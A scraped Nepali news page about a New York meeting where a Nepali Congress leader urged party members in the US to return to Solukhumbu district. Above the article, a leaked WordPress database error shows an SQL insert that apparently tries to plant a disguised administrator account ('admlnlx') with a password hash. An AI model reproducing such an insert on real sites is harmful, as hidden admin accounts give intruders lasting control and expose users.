WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTVZKyaXJVoS508A5uZghZx1pVvxsv.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 04:02:32', '', 'admlnlx', 'admlnlx')

अमेरिकामा रहेका नेता कार्यकर्ता हरुलाई जिल्ला फर्किन ने का नेता कार्किको आग्रह – Gaule Khabar

अमेरिकामा रहेका नेता कार्यकर्ता हरुलाई जिल्ला फर्किन ने का नेता कार्किको आग्रह

अमेरिकामा रहेका नेता कार्यकर्ता हरुलाई जिल्ला फर्किन ने का नेता कार्किको आग्रह

नेपाली कांग्रेस सोलुखुम्बु न्युयोर्क सम्पर्क समितिले न्यूयोर्कमा एक छलफल कार्यक्रम आयोजना गरेको छ ।

नेपाली जनसम्पर्क समिति अमेरिकाका पूर्व उपध्यक्ष श्री मिङमार शेर्पाको अध्यक्षता तथा नेपाली काँग्रेस सोलुखुम्बुका नेता एबम समाजसेवी प्रकाश सिंह कार्कीको प्रमुख आतिथ्यतामा कार्यक्रम सम्पन्न भएको हो ।

कार्यक्रममा सम्बोधन गर्दै प्रकाश सिंह कार्कीले नेपाली कांग्रेस सोलुखुम्बुमा पुनर्जागरण ल्याउदै कांग्रेसको नेतृत्वमा जिल्लाको बिकाश, निर्माण र रोजगारी सिर्जना गरेर जनाताको आशा र भरोशा कायम गर्न अमेरिकामा रहेका सबै पुराना कांग्रेस नेता कार्यकार्ताहरुलाई सोलुखुम्बु फर्कन आग्रह गरेका छन । जन्मभुमीप्रतीको दायित्व सबैले पुरा गर्नु पर्ने उल्लेख गर्दै नेता कार्किले यतिबेला नेपाली कांग्रेस पार्टी र समग्र जिल्लाले सबैको साथ खोजेकोले अब सबैले आ-आफ्नो दायित्व पुरा गर्ने समय आएको बताए ।

अन्या बक्ताहरुले नेपाली कांग्रेस सोलुखुम्बुमा लामो समय सम्म नेताहरुको राजनितिक बिबाद, गुट्बन्दी र घर झगडाले आक्रन्त बनेको र अब नयाँ ढङ्गले जानुको बिकल्प नभएको भन्दै कांग्रेस सोलुखुम्बु को सुधारका लागी आफुहरु जेसुकै गर्न तयार रहेको बताए ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका